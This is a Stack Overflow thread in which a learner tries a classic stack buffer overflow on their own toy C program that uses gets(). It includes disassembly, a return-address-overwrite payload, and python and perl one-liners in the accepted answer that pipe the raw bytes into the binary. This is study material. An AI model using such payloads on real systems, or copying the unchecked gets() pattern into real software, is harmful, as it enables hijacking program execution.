Need Help Executing Simple Buffer Overflow

Question

I am trying to execute a buffer overflow on this code:

#include <stdio.h>

CanNeverExecute(){
    printf ("You should not be seeing this , right?\n");
}

Greet(){
    char buf [8];
    gets(buf); // This line is vulnerable because "gets" does not perform a length check, it just copies the whole user input
    printf ("Good day, %s\n", buf);
}

int main(){
    Greet();
    return 0;
}

This is the disassembled Greet function:

080484b1 <Greet>:
 80484b1:   55                      push   %ebp
 80484b2:   89 e5                   mov    %esp,%ebp
 80484b4:   53                      push   %ebx
 80484b5:   83 ec 14                sub    $0x14,%esp
 80484b8:   e8 03 ff ff ff          call   80483c0 <__x86.get_pc_thunk.bx>
 80484bd:   81 c3 43 1b 00 00       add    $0x1b43,%ebx
 80484c3:   83 ec 0c                sub    $0xc,%esp
 80484c6:   8d 45 f0                lea    -0x10(%ebp),%eax
 80484c9:   50                      push   %eax
 80484ca:   e8 61 fe ff ff          call   8048330 <gets@plt>
 80484cf:   83 c4 10                add    $0x10,%esp
 80484d2:   83 ec 08                sub    $0x8,%esp
 80484d5:   8d 45 f0                lea    -0x10(%ebp),%eax
 80484d8:   50                      push   %eax
 80484d9:   8d 83 c7 e5 ff ff       lea    -0x1a39(%ebx),%eax
 80484df:   50                      push   %eax
 80484e0:   e8 3b fe ff ff          call   8048320 <printf@plt>
 80484e5:   83 c4 10                add    $0x10,%esp
 80484e8:   90                      nop
 80484e9:   8b 5d fc                mov    -0x4(%ebp),%ebx
 80484ec:   c9                      leave
 80484ed:   c3                      ret

If I am not making a mistake, I have to enter 16 bytes to fill the buffer because this instruction allocates 16 bytes, right? 80484d5: 8d 45 f0 lea -0x10(%ebp),%eax

So I can enter 16 chars then 4 bytes of ebp = 20 bytes + the address of CanNeverExecute. The address shows up as 08048486 in objdump and my machine is little endian so I enter 20 bytes of random characters + address like this:

AAAAAAAAAAAAAAAAAAAA\x86\x84\x04\x08

But it does not work. I can't find the mistake, please help me ty.

If "AAAAAAAAAAAAAAAAAAAA\x86\x84\x04\x08" is the exact input stream, it will not work because the '\x##' is just a sequence of ASCII characters, not values you need there. How exactly are you providing the input? — jwdonahue
– jwdonahue, Commented May 14, 2021 at 22:05
I am running the program then entering the input exactly as the input stream. I don't understand how should I enter the address — erinc
– erinc, Commented May 14, 2021 at 22:06
You will be hard pressed to enter the data using the keyboard. Take a look at asciitable.com. What you need to do is write the byte sequence to a file, then redirect that to your code. — jwdonahue
– jwdonahue, Commented May 14, 2021 at 22:11
If you mean the ascii for these bytes, it is: HH. But € does not display properly in server and I only see " HH". I can write to a file if that solves the problem, should I write the input in my question to the file, like AAAAAAAAAAAAAAAAAAAA\x86\x84\x04\x08 and then pipe it to the program? — erinc
– erinc, Commented May 14, 2021 at 22:15
Your C compiler will convert that string to the values you want, so write a short program to write it to the file, or get a good hex editor and write it out that way. Most good programmer's editors have hex editing modes for this purpose. — jwdonahue
– jwdonahue, Commented May 14, 2021 at 22:19

mkayaalp · Accepted Answer · 2021-05-14 22:52:39Z

2

When you enter the input with escape characters, you are actually providing the characters '\', 'x', '8', '6' etc. as separate ASCII-encoded bytes. If the characters had corresponded to some correct UTF-8 encoding, you could probably enter it at least by copying and pasting, if not through typing on your keyboard. But exploits rarely correspond to valid encodings, so an alternate is to use another program to supply the specific sequence of bytes through the input stream of your vulnerable binary.

You can use a python one-liner to supply your input containing escape characters:

python3 -c "import sys; sys.stdout.buffer.write(b'AAAAAAAAAAAAAAAAAAAA\x86\x84\x04\x08')" | ./yourbinary

Or using perl:

perl -e 'print "AAAAAAAAAAAAAAAAAAAA\x86\x84\x04\x08"' | ./yourbinary

edited May 14, 2021 at 22:52

answered May 14, 2021 at 22:25

mkayaalp

2,73612 silver badges17 bronze badges

Sign up to request clarification or add additional context in comments.

3 Comments

jwdonahue Over a year ago

Or you could write a script to both run the executable and redirect to the child's stdin.

erinc Over a year ago

Thank you for your answer but I do not have access to python on this server and I am not allowed to install anything neither :( I think I will try to write the same in perl.

oxagast Over a year ago

The printf command line utility should work if python and perl aren't installed.

Collectives™ on Stack Overflow

Need Help Executing Simple Buffer Overflow

1 Answer 1

3 Comments

Your Answer

Hot Network Questions

Collectives™ on Stack Overflow

1 Answer 1

3 Comments

Your Answer

Sign up or log in

Post as a guest

Related